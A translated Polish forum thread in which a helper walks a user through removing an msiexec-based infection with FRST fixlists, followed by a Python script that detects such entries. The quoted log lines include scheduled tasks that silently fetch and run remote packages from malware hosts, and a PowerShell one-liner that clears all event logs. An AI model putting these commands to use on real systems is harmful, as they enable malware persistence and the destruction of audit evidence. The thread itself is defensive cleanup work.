paweleke, posted 15 January 2019

Hi. For some time now I have had an annoying and intriguing problem. When I open the browser and try to search for the better-known antivirus programs, the browser freezes ("not responding"). The same happens when installing antivirus software. In safe mode everything works, which is why I was able to produce the logs (in normal mode FRST goes "not responding"). Zemana points to "compromised processes" visible in the log ("skanowanie.txt"); repairing them does solve the problems, but after some time (or after restarting the computer, I am not sure) they reappear and the problem returns. I tried scanning with bootable antivirus tools, but without success.

Logs: Skanowanie.txt FRST.txt Shortcut.txt Addition.txt

jessica, posted 15 January 2019

The same infection as in the topic https://www.fixitpc.pl/topic/34454-prośba-o-pomoc-otwieranie-różnych-stron-w-firefox/

Run FRST. Press CTRL+Y on the keyboard. Notepad will open; paste the following into it:

C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe
C:\Users\PiotriPawel\AppData\Roaming\dfIMY.exe
C:\Program Files (x86)\Common Files\eipFKxy.exe
C:\Users\PiotriPawel\AppData\Local\imw.ini
Task: {4E973841-FF20-4A0D-987F-52FDDE1CBE2E} - System32\Tasks\ikwmdb => "msiexec" -package hxxps://guardname.net/vvohqowru.gtb /q
Task: {C83F099F-5CBB-446C-83B0-B427D7F10F96} - System32\Tasks\oicieucak => "msiexec" /q -package hxxps://guardname.net/yfyuiejeluijii.iia
Task: {E2D671E8-287A-43D2-B319-8701BCFEBBF1} - System32\Tasks\{882E246F-2FA3-E339-BC45-CBDDDC20F917} => "msiexec.exe" /package hxxps://sensernyteg.com/ef4jom666zm0.ayo -q
FirewallRules: [{75CE7C8F-6BB8-4006-8B8F-5B8C6945E34F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku
FirewallRules: [{574CB234-5DCE-4490-8CE6-9EE91990E1B2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku
FirewallRules: [{89E78528-CFEF-4C16-8439-C4C7AE406EE1}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Corporation)
FirewallRules: [{2AE89C34-DFB0-4383-A3D0-FA1200F50B90}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe (Microsoft Corporation)
FirewallRules: [{621AD324-338C-4230-96EB-F06F163E5E44}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\dfIMY.exe (Microsoft Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe, [33792 2018-09-15] (Microsoft Corporation)
ShellExecuteHooks: Brak nazwy - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - -> Brak pliku
ShellExecuteHooks-x32: Brak nazwy - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - -> Brak pliku
HOSTS:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku
HOSTS:
FirewallRules: [{C49A17C8-7A52-4483-A3D1-F2518D16FE53}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku
FirewallRules: [{AEA7D350-3B5A-4355-81BD-0223CDD934E5}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku
GroupPolicy: Ograniczenia ? <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <==== UWAGA
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
C:\Users\PiotriPawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free.lnk
C:\Users\PiotriPawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
EmptyTemp:

Press CTRL+S on the keyboard. In FRST click Fix (NAPRAW).
Make new FRST logs.

jessi

paweleke (author), posted 15 January 2019

Thanks for the quick reply. I did as you said and everything seems to be working now. Nevertheless, I made logs and am attaching them below. If you conclude that everything is okay, I would also like to ask for an explanation of what the cause was, what kind of virus it was, how it worked, where it sat, why the antiviruses did not see it, etc. Thanks in advance and have a nice evening :)

LOGS: Addition.txt Fixlog.txt FRST.txt Shortcut.txt

jessica, posted 15 January 2019

Not everything yet: run FRST. Press CTRL+Y on the keyboard. Notepad will open; paste the following into it:

C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe
FirewallRules: [{FCC20B83-E97C-4480-8D03-342CEB67D6F6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation)
FirewallRules: [{42BE78AC-5978-4EAE-9693-B4C7F7B4467F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation)
FirewallRules: [{9DAA05A9-4136-473E-AC3D-C3334B56CD3C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{B102FF1D-FDEF-4FF0-92E4-6C6F2CE84E81}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation)
HOSTS:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Press CTRL+S on the keyboard. In FRST click Fix (NAPRAW).

The infection got onto the computer with some game, but I do not remember which game specifically. The infection infects "msiexec", and its files are always in these folders:

C:\Users\<username>\AppData\Roaming
C:\Program Files\Common Files
C:\Users\<username>\AppData\Local
C:\Program Files

I do not know why antiviruses have not yet learned to detect this infection.

Quote:

Task: {4142DA09-42F9-44A0-ADF4-371C97BD6CE2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2019-01-14] (AVAST Software)
2019-01-15 14:51 - 2019-01-15 14:51 - 000000000 ____D C:\ProgramData\Emsisoft
2019-01-11 20:04 - 2019-01-11 20:04 - 000057640 _____ C:\ProgramData\agent.uninstall.1547233462.bdinstall.v2.bin
2019-01-11 10:32 - 2019-01-11 10:32 - 000076892 _____ C:\ProgramData\agent.update.1547199122.bdinstall.v2.bin
2019-01-11 01:15 - 2019-01-11 01:15 - 000000000 ____D C:\ProgramData\Bitdefender
2019-01-11 01:14 - 2019-01-11 01:14 - 000000000 ____D C:\Users\PiotriPawel\AppData\Roaming\QuickScan
2019-01-11 01:12 - 2019-01-11 01:12 - 000102924 _____ C:\ProgramData\agent.1547165525.bdinstall.v2.bin
2019-01-11 01:12 - 2019-01-11 01:12 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2019-01-11 01:11 - 2019-01-11 01:11 - 010372016 _____ C:\Users\PiotriPawel\Downloads\bitdefender_online.exe
2019-01-07 20:44 - 2019-01-07 20:45 - 000000000 ____D C:\ProgramData\F-Secure
2019-01-07 20:44 - 2019-01-07 20:44 - 000000000 ____D C:\Users\PiotriPawel\AppData\Local\F-Secure

Whatever you will not be using, remove.

jessi
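
The persistence pattern in the fixlists above (scheduled tasks that run msiexec against a remote package, plus firewall Allow rules for executables dropped in AppData) can be triaged automatically from FRST log lines. The following is an added example, not part of the original thread and not FRST's own code; the function names are hypothetical, and the "executable directly in the AppData\Roaming or AppData\Local root" rule is a heuristic assumed here from the paths in this thread.

```python
import re

# Lines copied from the FRST fixlists and log quote in this thread (URLs defanged as posted).
SAMPLE_LOG = r'''
Task: {4E973841-FF20-4A0D-987F-52FDDE1CBE2E} - System32\Tasks\ikwmdb => "msiexec" -package hxxps://guardname.net/vvohqowru.gtb /q
Task: {C83F099F-5CBB-446C-83B0-B427D7F10F96} - System32\Tasks\oicieucak => "msiexec" /q -package hxxps://guardname.net/yfyuiejeluijii.iia
Task: {E2D671E8-287A-43D2-B319-8701BCFEBBF1} - System32\Tasks\{882E246F-2FA3-E339-BC45-CBDDDC20F917} => "msiexec.exe" /package hxxps://sensernyteg.com/ef4jom666zm0.ayo -q
Task: {4142DA09-42F9-44A0-ADF4-371C97BD6CE2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2019-01-14] (AVAST Software)
FirewallRules: [{2AE89C34-DFB0-4383-A3D0-FA1200F50B90}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe (Microsoft Corporation)
FirewallRules: [{89E78528-CFEF-4C16-8439-C4C7AE406EE1}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Corporation)
FirewallRules: [{75CE7C8F-6BB8-4006-8B8F-5B8C6945E34F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku
'''

TASK_RE = re.compile(r'^Task: \{[0-9A-Fa-f-]+\} - (?P<name>.+?) => (?P<cmd>.+)$')
MSIEXEC_RE = re.compile(r'^"?(?:[^"]*\\)?msiexec(?:\.exe)?"?\s+(?P<args>.+)$', re.I)
URL_RE = re.compile(r'^h(?:tt|xx)ps?://', re.I)  # also accepts defanged hxxp(s)
FW_RE = re.compile(
    r'^FirewallRules: \[\{[0-9A-Fa-f-]+\}\] => \((?P<action>\w+)\) '
    r'(?P<path>.+?\.exe)(?: \((?P<vendor>[^)]*)\)| Brak pliku)?$', re.I)
# Heuristic (assumption): an .exe sitting directly in the AppData\Roaming or AppData\Local root.
APPDATA_ROOT_RE = re.compile(
    r'^[A-Z]:\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\[^\\]+\.exe$', re.I)


def remote_msiexec(cmd):
    """Return (url, quiet) if cmd runs msiexec on a remote package, else None."""
    m = MSIEXEC_RE.match(cmd.strip())
    if not m:
        return None
    args = m.group('args').split()
    url, quiet = None, False
    for i, tok in enumerate(args):
        if tok[0] not in '-/':      # msiexec accepts both "-opt" and "/opt"
            continue
        opt = tok[1:].lower()
        if opt in ('package', 'i') and i + 1 < len(args) and URL_RE.match(args[i + 1]):
            url = args[i + 1]
        elif opt.startswith('q'):   # /q, /qn, /quiet: no user interface
            quiet = True
    return (url, quiet) if url else None


def scan(log_text):
    """Return findings as (kind, subject, detail) tuples for one FRST log excerpt."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        task = TASK_RE.match(line)
        if task:
            hit = remote_msiexec(task.group('cmd'))
            if hit:
                kind = 'task-msiexec-remote-silent' if hit[1] else 'task-msiexec-remote'
                findings.append((kind, task.group('name'), hit[0]))
            continue
        rule = FW_RE.match(line)
        if (rule and rule.group('action').lower() == 'allow'
                and APPDATA_ROOT_RE.match(rule.group('path'))):
            findings.append(('firewall-allow-appdata-exe', rule.group('path'),
                             rule.group('vendor') or 'no file'))
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep=' | ')
```
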

paweleke (author), posted 16 January 2019

Once again, many thanks, Jess :) Is it possible that it was the game RUST? :D By the way, this is a nice tool and I think I will get down to figuring out how it works :D Regards :)

Posting fresh logs: Addition.txt FRST.txt Shortcut.txt

jessica, posted 16 January 2019

In the new logs I no longer see anything to remove.

jessi